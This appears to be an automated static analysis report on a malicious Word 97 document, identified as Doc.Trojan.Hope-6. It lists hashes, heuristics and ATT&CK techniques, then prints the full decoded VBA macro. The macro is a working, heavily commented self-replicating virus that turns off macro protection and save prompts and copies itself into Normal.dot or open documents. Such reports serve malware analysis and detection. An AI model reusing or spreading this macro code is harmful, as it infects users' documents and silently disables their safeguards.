Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02637e9b20bbe464…

MALICIOUS

Office (OLE)

Size: 30.5 KB | Created: 2000-01-21 05:18:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: eae7eaac8e435434a8d8a318287406bc
SHA-1: f407e6140d6b1cc303bb764af71f8a19c82a8665
SHA-256: 02637e9b20bbe464d808275ab77ed0abb43efb07ef9334d29e84a2fe5fbfb4a4
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to infect other documents. The macro disables user prompts and conversion warnings to ensure its code is copied to the Normal.dot template or the active document. The ClamAV detection name 'Doc.Trojan.Hope-6' further confirms its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Trojan.Hope-6 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hope-6
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro that runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2035 bytes
SHA-256: e42d52b39e7638c94756e7c2dfa029544d8eb051f8fd135e9b3b98c5cbe902ed
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'// The Following Is A Simple Class
'// Virus. This Was Written To Help
'// Explain The Basics Of A Word 97
'// Class Module Virus. This Does
'// Not Go Into The Theory Of Class
'// Infection But Instead Comments
'// On The Technique Used In This
'// Example.

Private Sub Document_Open()
'// This Hooks The Document Open And Will
'// Run The Code Between The Sub/End Sub

Application.EnableCancelKey = wdCancelDisabled
'// This Prevents The User From Stoping
'// Macro Execution

Options.ConfirmConversions = Yes
'// This Disables Document Conversion
'// Warning... Yes = 0 = False

Options.SaveNormalPrompt = Yes
'// This Disables The Save Changes
'// Warning For The NormalTemplate
'// Again Yes = 0 = False

Options.VirusProtection = Yes
'// Disables Macro Warning
'// Yes = 0 = False

If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
'// This Sets The Target To Infect

I = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
'// This Creates The String 'I' To Equal
'// The Viral Code

Set Destination = Target.VBProject.VBComponents.Item(1).CodeModule
'// This Sets The 'Destination' To Which
'// The Virus Will Use To Clear And Infect

Destination.DeleteLines 1, Destination.CountOfLines
'// This Clears The Target Destination
'// So That The Virus Will Have A Clean
'// Module To Infect

Destination.AddFromString I
'// This Adds The Virus Code To The
'// Destination

If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'// If The Target Is The ActiveDocument
'// It Will Save The Changes The Virus
'// Made

End Sub
'// This Ends The Document_Open Sub